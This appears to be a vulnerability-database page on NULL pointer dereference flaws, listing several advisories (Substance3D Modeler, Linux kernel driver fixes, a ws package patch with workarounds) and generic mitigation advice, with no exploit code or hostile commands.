Vulnerability from github – Published: 2025-03-11 21:30 – Updated: 2025-03-11 21:30Substance3D - Modeler versions 1.15.0 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Vulnerability from github – Published: 2025-10-01 09:30 – Updated: 2026-01-16 21:30In the Linux kernel, the following vulnerability has been resolved:
pcmcia: Add error handling for add_interval() in do_validate_mem()
In the do_validate_mem(), the call to add_interval() does not handle errors. If kmalloc() fails in add_interval(), it could result in a null pointer being inserted into the linked list, leading to illegal memory access when sub_interval() is called next.
This patch adds an error handling for the add_interval(). If add_interval() returns an error, the function will return early with the error code.

wifi: wfx: fix possible NULL pointer dereference in wfx_set_mfp_ap()
Since 'ieee80211_beacon_get()' can return NULL, 'wfx_set_mfp_ap()' should check the return value before examining skb data. So convert the latter to return an appropriate error code and propagate it to return from 'wfx_start_ap()' as well. Compile tested only.

Vulnerability from github – Published: 2024-05-01 06:31 – Updated: 2024-12-23 15:30In the Linux kernel, the following vulnerability has been resolved:
usb: xhci: Add error handling in xhci_map_urb_for_dma
Currently xhci_map_urb_for_dma() creates a temporary buffer and copies the SG list to the new linear buffer. But if the kzalloc_node() fails, then the following sg_pcopy_to_buffer() can lead to crash since it tries to memcpy to NULL pointer.
So return -ENOMEM if kzalloc returns null pointer.

Patches
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e).
Workarounds
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the [
--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than theserver.maxHeadersCountlimit can be sent. - Set
server.maxHeadersCountto0so that no limit is applied.

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

Vulnerability from github – Published: 2024-12-27 15:31 – Updated: 2025-11-03 21:31In the Linux kernel, the following vulnerability has been resolved:
media: amphion: Set video drvdata before register video device
The video drvdata should be set before the video device is registered, otherwise video_drvdata() may return NULL in the open() file ops, and led to oops.

Mitigation MIT-56
For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].
Mitigation
Select a programming language that is not susceptible to these issues.
Mitigation
Check the results of all functions that return a value and verify that the value is non-null before acting upon it.
Mitigation
Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.
Mitigation
Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.
